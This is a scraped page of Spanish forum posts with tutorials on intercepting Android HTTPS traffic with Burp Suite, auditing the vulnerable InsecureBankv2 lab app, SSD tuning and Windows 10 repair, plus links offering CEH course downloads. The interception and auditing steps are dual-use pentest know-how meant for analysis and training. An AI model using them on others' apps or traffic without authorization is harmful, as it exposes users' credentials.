    Estos son pocos ejemplos de situaciones que se generan frecuentemente en múltiples comunidades de hacking. Se solicita por favor evitar este tipo de publicaciones, dado que incumplen la normativa de la sección.

    III. Formato y contenido.

    El formato es algo fundamental para que el resto de la comunidad pueda interpretar correctamente su mensaje y dar apoyo acorde a éste.
    Dicho esto, se darán a conocer los formatos básicos para crear una publicación en la sección.

    A. Título.

    El título debe ser descriptivo y breve, es fundamental para que se pueda interpretar el contenido de forma correcta. Un título ejemplar es el que describe de forma resumida la consulta. Gracias a este pequeño texto, las demás personas que estén buscando una duda similar podrán encontrarla de forma más fácil en el buscador.

    Problema al iniciar los módulos de Kernel.

    Sencillo y concreto; Logra que se interprete que el mensaje publicado habla sobre un problema al cargar los módulos de Kernel.

    Se descartarán dudas con títulos genéricos, como, por ejemplo: No funciona mi máquina virtual. Este título no logra las expectativas requeridas.

    B. Cuerpo.

    En el cuerpo del mensaje se espera que el usuario se exprese de la forma más detallada posible. Generalmente los mensajes con imágenes ayudan a entender más fácilmente de que trata, así que no es mala idea poner alguna imagen al tratarse de un problema.



    Como último —pero no menos importante—, se puede completar el mensaje proveyendo un poco más de información sobre el problema. Tal vez explicando que esto sucedió luego de instalar o desinstalar un programa, o tal vez luego de un BSoD (Blue Screen of Death).

    C. Códigos y enlaces.

    Todo código o salida de comandos debe ir encerrado en los tags

    Código: php


    Los enlaces que no pertenezcan a underc0de deben ir con los tags

    Código: php


    IV. Un pequeño resumen...

    Finalmente, quiero resumir de forma muy sencilla partes de la normativa que no se explicaron de forma concreta.

    A. El tiempo es importante. El mensaje también.

    Se ruega tomarse todo el tiempo que considere necesario para expresarse de forma correcta y concreta. Si en el momento no tiene el tiempo suficiente, déjelo para después, ¡los usuarios todavía querrán ayudarlo!

    B. ¿Aún sin respuesta?

    No se preocupe si aún no ha recibido una respuesta. Esto significa que tal vez en el momento no había usuarios disponibles para responder, o tal vez estaban respondiendo una duda anterior. ¡No se preocupe! Tarde o temprano, sea donde sea, será respondida.

    Si tiene una duda resuelta, evite continuar con mas inquietudes en el mismo tópic.

    V. ¿Duda solucionada?

    Si ha llegado este momento, ¡felicidades!, su duda fue resuelta y estará listo para continuar con el proyecto que tenía en mente.
    Para informar que ésta fue solucionada, hay que hacer —inevitablemente— dos cosas: Cambiar el icono del mensaje por "resuelto" y agregar el prefijo "[SOLUCIONADO]" al tema.



    ¡Y eso es todo! El mensaje pasará a catalogarse automáticamente como solucionado.

    VI. Agradecimientos.

    Se agradece a todos los usuarios que cumplen la normativa general del foro y la de este subforo en cuestión. Gracias a ustedes existe una mayor organización en cuanto a todos los temas, así generando poco ruido visual y creando una sensación agradable para la vista del espectador. Nuevamente, ¡gracias!

    También se les da las gracias a los moderadores, moderadores globales, coadministradores y administradores que mantienen el foro limpio y ordenado día a día. ¡Gracias!
#49
Mientras el malware móvil se vuelve cada vez más complejo, algunas prácticas de análisis se tornan cada vez más necesarias; entre ellas, la de interceptar tráfico enviado mediante protocolos seguros –en particular, HTTPS–. En este tutorial aprenderás cómo puedes configurar tu entorno de análisis para analizar muestras maliciosas o aplicaciones en búsqueda de vulnerabilidades.

¡Manos a la obra!

Existen diferentes maneras de configurar un proxy en un sistema Android y numerosas herramientas que pueden utilizarse para este propósito. En este artículo utilizaremos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero bien podrías usar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (de OWASP) o cualquier otro de similares características.

Comenzaremos inicializando Burp Suite. Seleccionaremos la pestaña Proxy &gt; Options y allí añadiremos una nueva configuración de escucha de tráfico con el botón Add –también puedes editar la configuración preexistente con el botón Edit–. Esto nos abrirá una nueva ventana donde deberemos establecer la IP y el puerto de nuestro proxy: normalmente, la IP local y el puerto de preferencia:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tras presionar el botón «OK» y cerciorarnos de que el listener que nos interesa está marcado como activo –running–, podemos pasar a configurar el emulador. Si se está trabajando con Genymotion, comenzaremos la configuración del proxy modificando los Settings de la aplicación. En la solapa de características de red podremos ingresar la IP y puerto que definimos primeramente en Burp Suite.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para finalizar deberemos configurar la conexión de red en el emulador ejecutando Android. Para ello nos dirigiremos a Ajustes &gt; Wi-Fi y mantendremos seleccionada la red a la cual estamos conectados, lo que nos dará la posibilidad de modificar sus propiedades. Luego activaremos la opción de opciones avanzadas y nuevamente ingresaremos la IP y puertos deseados, resultando una imagen semejante a la que se muestra a continuación:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Tras guardar la nueva configuración de red, se deberá reiniciar la conexión. Ahora puedes realizar una prueba ingresando a algún sitio web desde el navegador del dispositivo y verás cómo Burp Suite te permite visualizar todo el tráfico HTTP. No olvides indicar a la herramienta que debe comenzar a interceptar el tráfico:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¿Hemos terminado ya? Aún no, pues todavía no podemos visualizar conexiones protegidas, es decir, interceptar tráfico HTTPS. Para ello necesitaremos instalar el certificado de Burp Suite. Ingresa desde el navegador del emulador a la siguiente URL:

http://burp/

Verás una página de Burp Suite que te permitirá descargar el certificado que necesitamos. Haz clic en el botón con la leyenda «CA Certificate». Esto descargará el certificado a la carpeta de descargar del sistema de archivos. Busca el archivo descargado y haz clic en él: esto te permitirá instalarlo en el sistema. Una ventana te pedirá que le asignes un nombre y dejaremos el que tiene por defecto:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez instalado el certificado podrás administrarlo dentro de los certificados de usuario, accediendo desde Ajustes &gt; Seguridad &gt; Certificados de confianza y seleccionando la solapa Usuario:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¡Muy bien! Ya podrás observar en BurpSuite el tráfico enviado con el protocolo HTTPS:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y ahora, ¿hemos acabado? No. Algunas aplicaciones implementan algo denominado SSL pinning: este es un proceso en el cual se verifica no solo que el certificado enviado por el servidor sea válido, sino también que sea el certificado del servidor correcto. Esto mejora notablemente la seguridad cuando se trata de aplicaciones genuinas, pero complica el análisis cuando se están buscando comportamientos maliciosos.

Para hacer frente a este escenario podemos utilizar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta conjuntamente a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#50
Este es el curso más avanzado del mundo sobre Hacking Ético, con 18 de las técnicas de seguridad más usadas que cualquier hacker necesita conocer para reforzar la seguridad de su organización. En 18 módulos exhaustivos, el curso cubre 270 metodologías de ataque normalmente usadas por los hackers.




Nuestros expertos en seguridad han diseñado más de 140 laboratorios que imitan escenarios en tiempo real para que puedas "vivir" un ataque como si fuese real y proporcionandote acceso a más de 2200 herramientas de hacking comunes para introducirte en el mundo de los hackers.

Download CEH v9 modules

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Download CEH v9 Tools

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Mirrors Download CEH v9 Tools

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 144M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 171M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 13M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 489M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 80M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 87M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 116K
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 39M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 88M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 293M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 21M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 691M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 71M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 13M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 7M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 125M
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 187M

Laboratorios: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#51



A día de hoy ya casi todos los usuarios tienen un dispositivo de estado sólido (SSD) en su sistema, pero la única similitud de éstos con un disco duro "tradicional" es que sirven para almacenar archivos. En éste tutorial os vamos a enseñar cómo configurar tu SSD bajo el sistema operativo Windows 10 de manera que puedas ya no solo optimizar su rendimiento, sino también ampliar el tiempo de vida útil del dispositivo.

En ésta web os hemos hablado largo y tendido sobre cómo funcionan y de qué modo procesan la información los SSDs, así que no vamos a incidir en el tema. Si te interesa conocer a fondo las diferencias entre los diferentes chips de SSD, cómo una actualización de firmware puede alterar de manera notable el rendimiento cambiando la manera en la que se distribuye la información entre sus celdas o las diferentes controladoras de SSD, te recomendamos echar un vistazo a nuestro antiguo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. De hecho, el tutorial que os planteamos en el día de hoy es una actualización del anterior para adaptarlo a Windows 10.


CONSIDERACIONES PREVIAS

  • Antes de hacer nada, es recomendable tener instalada la última versión del firmware del fabricante de tu SSD, pues como hemos explicado hace un momento una simple actualización puede cambiar radicalmente el rendimiento del SSD, y además maximiza su compatibilidad.

  • Además de eso, también es importante que en la BIOS tengamos el SSD configurado (asumiendo que está conectado a un puerto SATA de la placa base) en modo AHCI, pues si lo tuviéramos configurado en modo IDE estaríamos perdiendo una enorme parte de rendimiento.

  • Por último, a la hora de dar formato al SSD para poder comenzar a instalar cosas en él (incluyendo el sistema operativo, por lo que éste ha de ser uno de los primeros pasos) hay que tener en cuenta el alineamiento de sus sectores. Al contrario que los discos duros mecánicos, cuyo alineamiento suele estar en 512 bytes por sector, los SSDs funcionan mejor con un alineamiento de 4 KB por sector.

  • Los pasos a realizar seria mejor hacerlos después de instalar Windows en el equipo.

    (Recuerden antes de instalar el sistema entrar en bios y cambiar de modo IDE a modo AHCI).


    CONFIGURACIÓN DEL SSD EN WINDOWS 10

    Asumimos que ya tenemos el último firmware instalado, el SSD conectado a un puerto SATA configurado en modo AHCI, la alineación de sectores configurada correctamente y el sistema operativo Windows 10 recién instalado. A partir de aquí, realizaremos las siguientes modificaciones en la configuración para optimizar el rendimiento del SSD bajo Windows 10.


    Desactivar la hibernación

    Como sabéis, los SSDs tienen un número limitado de ciclos de escritura. Por ello, es recomendable deshabilitar la hibernación si no la vais a utilizar puesto que Windows escribe la información albergada en la RAM en el SSD cada vez que el sistema entra en éste estado.

    Para hacerlo, vamos al Panel de Control y desde ahí seleccionamos "Opciones de energía".



    En la pantalla que aparece, dentro del plan de energía que queráis utilizar hay que darle a "Cambiar la configuración del plan".



    En la siguiente pantalla, seleccionamos "Cambiar la configuración avanzada de energía".



    Para terminar, buscamos la opción Suspender, la desplegamos y desactivamos la hibernación tal y como se muestra en la imagen. Acto seguido, aceptamos todas las pantallas y estará hecho.




    Desactivar Superfetch

    Ésta característica la introdujo Microsoft en Windows 7, y su misión es la de precargar los programas que más se utilizan en memoria para acelerar su ejecución. Esto viene muy bien para un disco duro mecánico, pero en un SSD de alto rendimiento es totalmente innecesario, por lo que si lo desactivamos no solo liberaremos espacio en la memoria RAM del equipo, sino que también aumentaremos la vida útil del SSD pues no se estará escribiendo información de manera constante en éste.

    Para desactivarlo debemos entrar en los servicios de sistema (ojo, hay que hacerlo como administrador) y la forma más directa de hacerlo es pulsando sobre el icono de Windows y escribiendo directamente "servicios" (también podríamos pulsar la tecla de Windows del teclado + R y en la ventana que aparece escribir "services.msc").



    En la pantalla que aparece con la lista de servicios de Windows buscamos "Superfetch". Como veis, aparece funcionando por defecto.



    Para desactivarlo, hacemos doble clic sobre su nombre y en la ventana que aparece lo detenemos y deshabilitamos tal y como se muestra en la imagen siguiente.



    Deshabilitar la caché de escritura

    De nuevo estamos ante una característica que Microsoft introdujo en Windows 7 y que su utilidad con SSDs es relativa. El incremento de rendimiento que proporciona es muy bajo en un SSD, pero por el contrario reduce considerablemente el tiempo de vida del dispositivo pues está constantemente escribiendo datos.

    Para desactivarlo, vamos al equipo, hacemos botón derecho sobre nuestra unidad SSD y le damos a propiedades.



    En la ventana que aparece, seleccionamos la pestaña Hardware y pulsamos sobre el botón propiedades de la zona inferior.



    Se abre una nueva ventana, en la que debemos pulsar sobre el botón "Cambiar la configuración".



    Se cierra la ventana actual y aparece una nueva. En ésta debemos seleccionar la pestaña Directivas y ahí desmarcar la opción "Habilitar caché de escritura en el dispositivo". Aceptamos todas las ventanas y reiniciamos el equipo para que el cambio surta efecto.




    Desactivar el indexado de la unidad



    Nos aparecerá una ventana de confirmación, en la que deberemos seleccionar que aplique los cambios a toda la unidad incluyendo subcarpetas y pulsar en aceptar.



    Comenzará un proceso automático de cambio de propiedades que tarda un buen rato, dependiendo de la velocidad del SSD y de la cantidad de archivos que tengamos en éste (por eso es recomendable hacer esto con Windows recién instalado).

    Desactivar el desfragmentador de disco

    El desfragmentador de disco vuelve a ser una utilidad que tiene una gran utilidad en discos duros mecánicos, pues "junta" la información de los archivos en sectores aledaños del disco, haciendo que su acceso sea mucho más rápido pues evita que el cabezal se mueva mucho. Ahora bien, en un SSD no solo no tiene sentido sino que además es perjudicial, dado que realiza una gran cantidad de ciclos de escritura en el mismo. Por ello, y dado que en Windows 10 viene habilitado de serie, es recomendable desactivarlo.

    Para hacerlo, volvemos a acceder a las propiedades de nuestra unidad SSD, y en la pestaña Herramientas seleccionamos el botón "Optimizar".



    Se abrirá una nueva ventana en la que podremos ver la agenda de optimización del disco a través del desfragmentador. Para desactivarlo, seleccionamos nuestro disco SSD entre las unidades disponibles y pulsamos sobre el botón de "Cambiar configuración".



    En la ventana que se abre, desmarcamos la opción "Ejecución programada" y pulsamos sobre Aceptar en todas las ventanas. Con esto el desfragmentador de disco habrá quedado desactivado para nuestro SSD.



    Con estos pasos tan sencillos habremos configurado correctamente nuestra unidad de estado sólido y conseguiremos que su vida útil sea más prolongada. Esperamos que os haya sido de ayuda.

    Ahora , como se si tengo el disco en modo AHCI?

    Lo recomendable es antes de instalar Windows entrar en la bios y cambiar de IDE a AHCI.

    Si ya instalaste el sistema y te das cuenta que lo tenes en IDE y lo quieres cambiar a AHCI te dará un error.

    Para solucionar este nuevo problema deberemos volver a configurar en la BIOS el bus SATA para que emplee el modo IDE, y una vez arrancado el sistema operativo acceder al registro de Windows.

    Podemos ejecutar el editor de registro (regedit.msc) de muchas maneras, mi preferida es:

    Pulsar la combinación de teclas : Windows + R



    Cumplimentamos el cuadro de texto con : regedit



    Pulsamos sobre el botón Aceptar

    Llegados a este punto, tengo que avisar que el editor de registro de Windows es una herramienta capaz de inutilizar el sistema operativo, así que se debe tener mucho cuidado al manipular los datos que nos ofrece.

    Una vez que hayamos iniciado el editor, debemos buscar la clave de registro:

    Código: php
    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesmsahci


    O

    Código: php
    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesstorahci


    y modificar el valor de REG_DWORD "Start", asignando un valor "0".



    Si fuéramos a emplear el modo RAID, deberíamos cambiar el valor de la clave

    Código: php
    HKEY_LOCAL_MACHINESystemCurrentControlSetServicesiaStorV


    también por un valor REG_WORD "Start" de "0".

    Con esto habremos configurado Windows para que reconozca e instale los controladores adecuados al iniciar el sistema. Ya sólo nos resta reiniciar el equipo y volver a configurar en la BIOS el modo SATA en AHCI.

    Cuando arranquemos la siguiente vez el equipo, será Windows quien se encargue de todo.

    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#52
Android / Auditando Aplicaciones en Android
Marzo 07, 2016, 08:38:41 AM
Vamos a ver algunos ejemplos de controles que se llevan a cabo en un Pentesting de Aplicaciones en Android. Lo más importante en un proceso de auditoría será el hacer uso de una metodología, de tal forma que podamos llevar a cabo una serie de pasos de manera ordenada.


Os propongo que hagamos uso de la metodología OWASP, concretamente en su apartado de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta podemos encontrarnos con muchos recursos: herramientas, guía de desarrollo seguro, plantilla de controles, guía de testing de Apps... Centrándonos en esta última podemos dividir nuestra auditoría en tres partes: recopilar información, análisis estático y análisis dinámico.


Para llevar a cabo las diferentes fases podemos encontrarnos muchas aplicaciones que automatizan nuestro trabajo, incluso que hacen la misma tarea de diferentes formas. Lo importante es tener un laboratorio con todas las herramientas funcionando, en este caso nosotros vamos a utilizar la distribución No tienes permitido ver los links. Registrarse o Entrar a mi cuenta como vimos el pasado Martes 23 de Febrero en la MasterClass con los alumnos de los cursos de Hacking Ético. Antes de nada tenemos que tener en cuenta que tipos de Apps podemos encontrarnos:

  • Nativas: la App funciona de manera independiente sin depender de servidor externo, tenemos los datos en el terminal.
  • Basadas en servicios Web: la App es un mero cliente que conecta a un servicio Web y solicita datos que después nos muestra.
  • Híbridas: una combinación de las dos anteriores.

Hablábamos de metodología y de pasar una serie de controles a nuestras aplicaciones móviles, por tanto vamos a llevar un control que se da también en las auditorías Web, que no es otro que el de análisis de las comunicaciones. Para llevar a cabo nuestra auditoría vamos a hacer uso de una aplicación de tipo híbrido que podemos encontrar dentro de la distribución Androl4b (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), la cual nos va a servir como entrenamiento para nuestros pentest.


Análisis de las Comunicaciones


Fase 1: Arrancando nuestro AVD en Androl4b


Antes de nada haceros un apunte, puede que a la hora de descargar la distribución tengáis fallos de conexión, ya que le suele pasar a mucha gente, os recomiendo que uséis algún gestor de descarga para no tener problemas. Una vez descargada, abrimos nuestra máquina virtual de Androl4b (credenciales andro:androlab) y tenemos que arrancar el Android Device Manager como vemos en la imagen, seleccionamos el dispositivo virtual (AVD Android Virtual Device) que ya trae creado (lab con Android 4.1.2) y Start.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Caso de querer hacer pasar las conexiones de nuestro dispositivo virtual a través de un proxy como Burp Suite, el cual ya incorpora dicha distribución, simplemente tenemos que lanzar el AVD desde la línea de comandos con el parámetro -http-proxy.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


También podemos configurar el proxy dentro del AVD siguiente la siguiente secuencia SettingMore...Mobile NetworksAccess Point NamesT-Mobile US (Seleccionar el APN que aparezca) – aquí configuramos el Proxy y Port, en nuestro caso la IP 192.168.41.135 y el puerto 8080.


Fase 2: Nuestro App Vulnerable con conexión al Banco


Como hemos comentado antes vamos a usar InsecureBankv2, la cual es una aplicación híbrida que consta de un cliente instalado en el terminal (en nuestro caso virtual) y un servidor que vamos a arrancar desde el terminal del sistema Androl4b.


El Server: para el cual nos vamos a la ruta donde está situado y ejecutamos con python la parte servidora. Vemos como se arrancará nuestro servidor del Banco virtual escuchando peticiones en el puerto 8888.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


La App: desde el AVD ejecutamos la App (Insecure Bank v2) y nos vamos a menú preferencias para configurar la IP del Server y el puerto.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fase 3: Análisis del Tráfico con Burp Suite


Ya tenemos todo preparado para analizar el tráfico de nuestra aplicación, pues tenemos todas las peticiones filtradas a través del proxy, de tal forma que  vamos a poder ver  todo el tráfico. Nos disponemos a poner nuestro usuario y contraseña y cual es nuestra sorpresa cuando vemos que el logueo en nuestra App del banco se lleva a cabo en texto plano, sin usar ningún cifrado, lo cual la hace vulnerable a ataques de MiTM.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Muchas veces los programadores añaden en el código información que les permite depurar el programa mientras está en fase de desarrollo, pero olvidan eliminar dicha información la cual puede ser útil para un atacante, llegándose a producir fugas de la misma.


Fugas de Información


Fase 1: El fichero AndroidManifest.xml


Uno de los ficheros más importantes a la hora de llevar a cabo la auditoría de una App es su fichero de manifiesto (AndroidManifest.xml), donde encontramos todas y cada unas de las funcionalidades de la App, así como los permisos y demás características. En este caso nos vamos a centrar en la característica debuggable de la App, esto puede provocar una fuga de información en su log la cual puede llegar a comprometer al sistema.


Obteniedo la APK: Lo primero será obtener la APK de la aplicación. Si no la encontramos en Internet no hay problema, para encontrarla simplemente buscamos el paquete dentro del AVD mediante ADB (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), una herramienta de línea de comandos que me permite comunicarme con el AVD en forma de terminal. Con esta herramienta también descargaremos la APK como vemos en la siguiente imagen.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Reversing a la APK: Lo siguiente será hacer un reversing a la APK con la herramienta No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, mediante la cual obtenemos los ficheros y el código fuente de la aplicación, entre ellos el AndroidManifest.xml.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Dentro de los fichero obtenidos abrimos el fichero AndroidManifest.xml y nos fijamos en la propiedad debuggable de la aplicación. Si está a verdadero estamos frente a un fallo de los programadores el cual va a provocar fugas de información.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Fase 2: Analizando el log con PidCat


Como hemos visto tenemos la aplicación en modo depuración, lo cual nos va a dar mucha información a través del log del sistema. Para ello con simplemente usar adb logcat podríamos ver mucha información. En este caso nosotros vamos a ver el log mediante un script en python (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta) que nos va a enriquecer el log con colores para que sea más fácil la búsqueda de información. En la siguiente imagen vemos como en el log quedaron registradas tanto las credenciales de un usuario (jack:Jack@123$) como una transacción bancaria por valor de 1000$.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Hemos visto hasta aquí un par de fallos de seguridad que puede tener cualquier aplicación móvil, pero existen muchos otros fallos como podemos ver en el OWASP Top 10 Mobile Risks. Espero que os haya resultado interesante y más adelante iremos viendo otros fallos de seguridad interesantes en Apps de Android.
#53
Windows / Reparar Windows 10 si falla o no arranca
Marzo 07, 2016, 08:20:03 AM
Hay varias situaciones en que puede hacerte falta reparar Windows 10. Por ejemplo por fallos de algún tipo, problemas al actualizarlo o cuando ni siquiera consigues que arranque. Sigue los pasos apropiados según tu caso.

PASO 1: Entra en reparar Windows 10



Hay varias situaciones en que puede hacerte falta reparar Windows 10. Por ejemplo por fallos de algún tipo, problemas al actualizarlo o cuando ni siquiera consigues que arranque. Sigue los pasos apropiados según tu caso.

CASO 1: SI PUEDES ENTRAR EN WINDOWS 10

  • Abre el menú Inicio de Windows y elige Configuración.
  • En la nueva ventana pincha en Actualización y seguridad.
  • Busca a la izquierda el enlace Recuperación y haz clic en él.
  • Localiza a la derecha la línea "Inicio avanzado". Pulsa el botón Reiniciar ahora que está bajo la descripción.

    SEGUÍ EL PASO 2, SI NO ARRANCA SEGUÍ CASO 2

    CASO 2: SI WINDOWS NO ARRANCA

    Va a hacerte falta UNA de estas tres cosas de Windows 10:

  • O su CD de instalación.
  • O un ISO de Windows 10. Graba el ISO en CD o USB siguiendo los pasos de ese enlace.
  • O un USB de arranque suyo. Puedes crearlo en un PC distinto del tuyo si tiene tu mismo Windows 10.

    De cualquiera de esas tres formas consigues un CD o USB con que arrancar tu equipo. Luego haz esto:

    1. Debes iniciar el PC con el CD o USB de Windows 10. En ese enlace explico los pasos para hacerlo por si los necesitas.

    2. Cuando arrancas desde CD sale el aviso Presione cualquier tecla para iniciar desde el CD o DVD. Hazlo lo más deprisa posible. Si no te da tiempo, reinicia e inténtalo de nuevo.

    Cuando inicias con un USB de Windows 10 puede o no salir el aviso de pulsar una tecla. Hazlo deprisa si te sale. Si no te sale, espera sin hacer nada hasta que aparezca una ventana donde elegir el idioma (puede tardar bastante en aparecer).

    3. Según el caso tienes que hacer una de estas dos cosas...

    O chequear que esté seleccionado el español en las tres listas desplegables y pulsar Siguiente. Y luego, en la nueva ventana, hacer clic abajo a la izquierda en Reparar el equipo.

    O elegir Español en la lista de idioma pinchando en él.


    NOTA:

    ¿Temes perder tus archivos del disco duro? Ve primero estas 3 formas de recuperar tus datos si Windows no arranca. Con tus archivos ya guardados intenta luego la reparación.

    Recuperar tus datos del disco duro si Windows no arranca

    A menudo es posible recuperar los datos, archivos y carpetas de tu disco duro incluso si Windows no arranca. Lo normal es que sigan intactos aunque no funcione tu PC. Puedes recuperarlos de varias formas sin entrar a Windows mediante alguno de estos tres modos.

    Los tres métodos siguientes funcionan bien aunque hay ciertas diferencias entre ellos. Ve sus ventajas e inconvenientes antes de elegir uno. Prueba con los otros si el que has elegido no te sirve por lo que sea.


    1. Usa el Bloc de notas sin entrar en Windows



    Es un truco poco conocido pero muy eficaz. Tu simple Bloc de notas puede salvarte el día. Lo más probable es que siga funcionando aunque no puedas entrar en tu PC. La idea es acceder al Bloc sin pasar por Windows y usarlo para conseguir hacer una copia de seguridad de tus cosas del disco duro.

    VENTAJAS:

    Es el método más sencillo de los tres.
    Funciona en español y en un "entorno" conocido para ti. Porque es el normal de Windows.
    No necesitas descargar ningún programa externo a Windows.

    INCONVENIENTES:

    Puede no funcionar si el fallo de tu Windows ha afectado al Bloc de notas.
    No permite copiar a la vez varios archivos o carpetas. Tienes que ir haciéndolo uno a uno.



    Ante un fallo grave del PC siempre existe la preocupación de qué habrá pasado con tus cosas. Este truco permite recuperar tus datos del disco duro aunque no puedas entrar en Windows.

    En Windows 8 u 8.1 o Windows 10

    1. Usa el botón de reinicio del PC para reiniciarlo varias veces seguidas (entre 2 y 4 veces) sin permitir que Windows se cargue. Si tu PC es un laptop portátil quizá no tenga botón de reinicio. En ese caso averigua en Google o en su manual el modo de forzar un reinicio usando el botón de encendido/apagado.

    2. Lo normal es que los reinicios forzados hagan que Windows muestre las opciones de arranque avanzadas. Elige Solucionar problemas, luego Opciones avanzadas y por último Símbolo del sistema.

    IMPORTANTE:

    Si las opciones no aparecen ve cómo entrar en ellas usando un CD o USB de Windows. Sigue las instrucciones para cuando no puedes entrar en él en Windows 8 u 8.1 o en Windows 10.

    No hagas nada mientras se cargan unos archivos y hasta que salga la consola de Ms-Dos (similar a la imagen de arriba). Escribe el comando notepad y pulsa Intro en tu teclado.

    PASO 2: Reparación de inicio (automática)



    Intentar la reparación automática de Windows 10 es la forma más fácil de resolver los problemas que tenga. La también llamada reparación de inicio busca y corrige errores de forma automática. No necesitas hacer casi nada ni tener muchos conocimientos para usarla.

    1. Desconecta cualquier CD o USB que puedas tener conectados.

    2. Si no lo has hecho ya, entra en las opciones de reparación mediante ELPASO 1.

    3. Elige entre esas opciones la de Solucionar problemas.

    4. En la siguiente pantalla selecciona Opciones avanzadas. Y luego Reparación de inicio en la pantalla en que entras.

    5. El equipo se reinicia por su cuenta. En cierto punto tienes que elegir tu cuenta de Windows. Pincha en ella. Luego escribe la misma contraseña que usas para entrar en Windows. Pulsa Continuar.

    6. La herramienta revisa tu PC buscando errores y trata de arreglarlos de forma automática. A veces podrá y otras no.



    PASO 3: Restaura Windows 10



    No confundas la opción de restaurar un PC en Windows 10 con la de restaurar el sistema. Restaurar el PC sirve para reinstalar los archivos del sistema y configuraciones predeterminados de Windows. El objetivo es resolver fallos graves de todo tipo.

    Restaurar el PC sólo mantiene los programas que Windows trae por defecto. También las apps que hayas instalado mediante su Tienda de aplicaciones. Los programas instalados por ti desde CD, USB o Internet se eliminarán. Tendrás que reinstalarlos tras la restauración.

    Todos tus archivos y carpetas se conservan como estén.

    Si has instalado Windows 10 sobre un Windows anterior es posible que la restauración devuelva al PC a ese Windows anterior. En ese caso tendrías que reinstalar Windows 10 cuando se complete.

    Para restaurar el PC

    1. Entra en las herramientas de reparación de Windows 10 como explico en el paso .

    2. Pincha en Solucionar problemas y después selecciona Restaurar tu PC.

